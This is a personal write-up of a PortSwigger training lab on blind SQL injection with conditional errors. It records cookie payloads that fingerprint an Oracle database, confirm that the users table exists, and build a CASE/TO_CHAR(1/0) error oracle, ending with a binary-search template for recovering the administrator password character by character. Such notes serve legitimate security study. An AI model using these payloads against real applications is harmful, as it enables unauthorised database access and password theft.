Subject
Lab: Blind SQL injection with conditional errors
Url: portswigger.net/web-securit…
Mind Palace
Whatever you click, with or without the cookie, the page (HTTP response) does not change at all; so the next step is to make it throw an error.
A double quote gives the normal response while a single quote breaks the query ==> confirms TrackingId is the injection point (the value lands inside a single-quoted string literal), and the presence or absence of the error message can serve as the condition signal.
Follow-up:
id' ==> Error
id'' ==> no error (the doubled quote is an escaped quote, so the string literal closes cleanly)
id'||(select '')||' ==> Error (a SELECT without FROM is invalid on Oracle)
id'||(select '' from dual)||' ==> normal response ==> Oracle database (DUAL only exists on Oracle)
id'||(select '' from qweasdzxc)||' ==> nonexistent table name ==> Error ==> the injection point is usable; exploitation route: blind injection driven by conditional errors
'||(select '' from users where rownum=1)||' ==> no error ==> the users table exists (rownum=1 keeps the scalar subquery to a single row; several rows would raise ORA-01427)
'||(select '' from users where username='administrator')||' ==> no error either way
==> the first payload proves the users table exists; the second does not by itself prove the administrator row exists, because a subquery that matches zero rows simply yields NULL and no error. To prove the row exists, the condition has to produce an error only when a row is actually found, which is what the official payload below does.
# Or, the official solution:
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' ==> Error ==> the administrator row exists (the CASE is only evaluated for a matching row)
id'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' ==> Error (THEN branch evaluates 1/0, ORA-01476 division by zero)
id'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||' ==> normal response (ELSE branch returns '')
==> a CASE expression with to_char(1/0) raises an error exactly when the condition is true, so any boolean condition can be tested one request at a time
# Core payload ({i} is the character position, {mid} the ASCII threshold of the binary search)
id'||(select case when ascii(substr(password,{i},1))>{mid} then to_char(1/0) else '' end from users where username='administrator')||'
# Note: substring has no effect here; use substr (Oracle has SUBSTR, not SUBSTRING)
# ==> first pin down length(password) with the same CASE pattern, then recover the administrator password one character at a time, halving the ASCII range on each request
Exploit code
END (づ。◕‿‿◕。)づ